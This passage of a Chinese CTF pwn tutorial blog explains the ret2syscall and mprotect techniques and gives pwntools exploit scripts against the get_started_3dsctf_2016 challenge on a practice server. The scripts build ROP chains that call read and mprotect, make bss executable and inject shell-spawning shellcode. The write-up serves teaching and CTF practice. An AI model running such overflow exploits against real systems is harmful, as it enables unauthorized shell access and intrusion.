class="line">pop_dcb = <span class="number">0x0806fc30</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x38</span>+p32(read)+p32(pop_3_ret)+p32(<span class="number">0</span>)+p32(bss)+p32(<span class="number">0x10</span>) <span class="comment">#read函数部分</span></span><br><span class="line">payload += p32(pop_eax) + p32(<span class="number">0xb</span>)+ p32(pop_dcb) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(bss)+ p32(int_80h) <span class="comment">#系统调用部分</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;/bin/sh\x00&#x27;</span> <span class="comment">#将bin/sh字符写入bss段</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure></div>

<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/sys12.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<h1 id="二、mprotect函数"><a href="#二、mprotect函数" class="headerlink" title="二、mprotect函数"></a>二、mprotect函数</h1><h2 id="2-1-介绍"><a href="#2-1-介绍" class="headerlink" title="2.1 介绍"></a>2.1 介绍</h2><p>mprotect函数是一个系统调用，用于修改进程的内存区域的保护属性。它位于C标准库的mprotect.h头文件中，并提供了一个接口供程序员使用。mprotect函数的原型如下：</p>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">mprotect</span><span class="params">(<span class="type">void</span> *addr, <span class="type">size_t</span> len, <span class="type">int</span> prot)</span>;</span><br></pre></td></tr></table></figure></div>

<p>参数说明：</p>
<ol>
<li>addr：指向要修改保护属性的内存区域的起始地址。addr必须是一个内存页的起始地址，简而言之为页大小整数倍。</li>
<li>len：要修改保护属性的内存区域的大小（以字节为单位）。最好为页大小整数倍</li>
<li>prot：内存要赋予的权限，可以使用以下常量进行设置：</li>
</ol>
<ul>
<li>PROT_NONE：该内存区域不可访问。</li>
<li>PROT_READ：该内存区域可读。</li>
<li>PROT_WRITE：该内存区域可写。</li>
<li>PROT_EXEC：该内存区域可执行。</li>
</ul>
<p>mprotect函数的作用是将指定内存区域的保护属性更改为指定的值。通过修改保护属性，可以控制进程是否可以读取、写入或执行相应的内存区域。简单来说，mprotect()函数把自addr开始的、长度为len的内存区的保护属性修改为prot指定的值。然后prot&#x3D;7，可读可写可执行。</p>
<h2 id="2-2-例子"><a href="#2-2-例子" class="headerlink" title="2.2 例子"></a>2.2 例子</h2><p>使用第一节的第二个例子，即题目：get_started_3dsctf_2016</p>
<p>在IDA中进行搜索，可以看到文件中存在mprotect函数：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/m1.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>使用gdb进行调试，下断点运行以后，使用vmmap查看内存权限：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/m2.png?x-oss-process=style/watermark"
                     
                ></p>
<p>可以把 0x080ea000 到 0x080ec000 都修改成可以执行的。因此得到mprotect的参数（0x080ea000，0x2000,0x7）。同样为了使程序继续执行我们构造好的系统调用，需要把压入的参数压出，因此我们在 read 返回地址处填入一个可以pop 3个的地址</p>
<p>然后使用read函数写入shellcode。和上一节构造read的方法相同。构造溢出如下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/m3.png?x-oss-process=style/watermark"
                     
                ></p>
<p>exp:</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># _*_ coding:utf-8 _*_</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">elf = ELF(<span class="string">&#x27;./get_started_3dsctf_2016&#x27;</span>)</span><br><span class="line"><span class="comment">#sh = process(&#x27;./get_started_3dsctf_2016&#x27;)</span></span><br><span class="line">sh = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">27237</span>)</span><br><span class="line">pop3_ret = <span class="number">0x0809e4c5</span></span><br><span class="line">mem_addr = <span class="number">0x080ea000</span> <span class="comment">#可读可写的内存,但不可执行</span></span><br><span class="line">mem_size = <span class="number">0x2000</span>    <span class="comment">#修改大小</span></span><br><span class="line">mem_proc = <span class="number">0x7</span>       <span class="comment">#可代表可读可写可执行</span></span><br><span class="line">mprotect_addr = elf.symbols[<span class="string">&#x27;mprotect&#x27;</span>]</span><br><span class="line">read_addr = elf.symbols[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">payload_01 = <span class="string">&#x27;A&#x27;</span> * <span class="number">0x38</span></span><br><span class="line">payload_01 += p32(mprotect_addr)</span><br><span class="line">payload_01 += p32(pop3_ret)   <span class="comment">#执行完mprotect的返回地址,使esp往下+12</span></span><br><span class="line">payload_01 += p32(mem_addr)   <span class="comment">#mprotect函数参数1 修改的内存地址</span></span><br><span class="line">payload_01 += p32(mem_size)   <span class="comment">#mprotect函数参数2 修改的内存大小</span></span><br><span class="line">payload_01 += p32(mem_proc)   <span class="comment">#mprotect函数参数3 修改的权限</span></span><br><span class="line">payload_01 += p32(read_addr)  <span class="comment">#执行完上面pop3_ret后到read函数</span></span><br><span class="line">payload_01 += p32(pop3_ret)   <span class="comment">#执行完read后将返回到pop3_ret指令,又继续使esp+12到mem_addr</span></span><br><span class="line">payload_01 += p32(<span class="number">0</span>)          <span class="comment">#read函数参数1 ,从输入端读取</span></span><br><span class="line">payload_01 += p32(mem_addr)   <span class="comment">#读取到的内容复制到指向的内存里</span></span><br><span class="line">payload_01 += p32(<span class="number">0x100</span>)      <span class="comment">#读取大小</span></span><br><span class="line">payload_01 += p32(mem_addr)   <span class="comment">#这里就是shellcode了</span></span><br><span class="line">sh.sendline(payload_01)</span><br><span class="line"><span class="comment">#gdb.attach(sh) #本地调试用</span></span><br><span class="line">payload_sh = asm(shellcraft.sh(),arch = <span class="string">&#x27;i386&#x27;</span>, os = <span class="string">&#x27;linux&#x27;</span>) <span class="comment">#生成x86架构下的shellcode</span></span><br><span class="line">sh.sendline(payload_sh)<span class="comment">#这就是read读入的内容，即shellcode</span></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure></div>

<p>成功修改内存：</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/m5.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

<p>获取flag:</p>
<img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/ret2syscall/m4.png?x-oss-process=style/watermark"
                      style="zoom:80%;" 
                >

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> ret2syscall+mprotect函数介绍</li>
        <li><strong>Author:</strong> wutong</li>
        <li><strong>Created at:</strong> 2023-07-09 21:49:25</li>
        
            <li>
                <strong>Updated at:</strong> 2023-07-18 21:09:41
            </li>
        
        <li>
            <strong>Link:</strong> https://wutong01304.github.io/2023/07/09/ret2syscall/
        </li>
        <li>
            <strong>License:</strong> This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>.
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/Pwn/">#Pwn</a>&nbsp;
                        </li>
                    
                        <li class="tag-item">
                            <a href="/tags/Stack/">#Stack</a>&nbsp;
                        </li>
                    
                        <li class="tag-item">
                            <a href="/tags/ret2syscall/">#ret2syscall</a>&nbsp;
                        </li>
                    
                </ul>
            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2023/07/11/ret2csu/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">ret2csu</span>
                                    <span class="post-nav-item">Prev posts</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/07/07/ret2libc/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">ret2libc+延迟绑定机制</span>
                                    <span class="post-nav-item">Next posts</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">ret2syscall+mprotect函数介绍</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81ret2syscall"><span class="nav-text">一、ret2syscall</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-1-%E4%BB%8B%E7%BB%8D"><span class="nav-text">1.1 介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2-INT-80%E4%B8%AD%E6%96%AD"><span class="nav-text">1.2 INT 80中断</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-3-%E4%BE%8B%E5%AD%901"><span class="nav-text">1.3 例子1</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-4-%E4%BE%8B%E5%AD%902"><span class="nav-text">1.4 例子2</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E3%80%81mprotect%E5%87%BD%E6%95%B0"><span class="nav-text">二、mprotect函数</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-%E4%BB%8B%E7%BB%8D"><span class="nav-text">2.1 介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-%E4%BE%8B%E5%AD%90"><span class="nav-text">2.2 例子</span></a></li></ol></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>
            
            

        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2023</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">wutong</a>
        </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a></span>
                <br>
            <span class="theme-version-container">THEME&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.2.1</a>
        </div>
        
        
        
        
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>





    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>






  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax',
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
